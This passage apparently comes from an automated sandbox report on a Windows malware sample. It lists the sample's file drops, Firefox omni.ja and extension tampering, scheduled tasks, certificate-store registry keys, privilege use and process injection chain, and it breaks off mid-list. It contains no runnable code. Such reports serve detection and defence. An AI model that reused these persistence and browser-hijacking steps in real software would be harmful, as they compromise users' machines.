File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Program Files (x86)\nolBHjueEzUn\pCVdaPp.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\KKCpynK.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\XylehJQ.xml C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Program Files (x86)\XYDCXZXPsTrrC\YxYyEsY.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Program Files (x86)\SvbbHukzU\kbwbtR.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\HvGgydgoxkjNzSQ.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\bLgAHCKDimrPMlxXg.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\bWLKrWFeqGsUKIPSIT.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\biFxKMwOTZzXEKwTU.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{06969d78-0000-0000-0000-d01200000000} C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4244 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS6304.tmp\Install.exe
PID 4244 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS6304.tmp\Install.exe
PID 4244 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS6304.tmp\Install.exe
PID 4200 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\7zS6304.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe
PID 4200 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\7zS6304.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe
PID 4200 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\7zS6304.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe
PID 2328 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2328 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2328 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2328 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2328 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2328 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1508 wrote to memory of 5116 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1508 wrote to memory of 5116 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1508 wrote to memory of 5116 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1960 wrote to memory of 1812 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1960 wrote to memory of 1812 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1960 wrote to memory of 1812 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 5116 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 5116 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 5116 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1812 wrote to memory of 4564 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1812 wrote to memory of 4564 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1812 wrote to memory of 4564 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 5116 wrote to memory of 1600 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 5116 wrote to memory of 1600 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 5116 wrote to memory of 1600 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1812 wrote to memory of 1028 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1812 wrote to memory of 1028 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1812 wrote to memory of 1028 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2328 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2328 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2328 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2328 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2328 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2328 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 316 wrote to memory of 3716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 316 wrote to memory of 3716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 2328 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2328 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2328 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2328 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2328 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2328 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3180 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\ZLQwkOe.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3180 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\ZLQwkOe.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3180 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\ZLQwkOe.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1852 wrote to memory of 1756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1852 wrote to memory of 1756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1852 wrote to memory of 1756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 4548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1756 wrote to memory of 4548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1756 wrote to memory of 4548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 2292 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 2292 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 2292 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 2032 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 2032 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 2032 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 3212 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 3212 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 3212 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 4932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1852 wrote to memory of 4932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\7zS6304.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\forfiles.exe

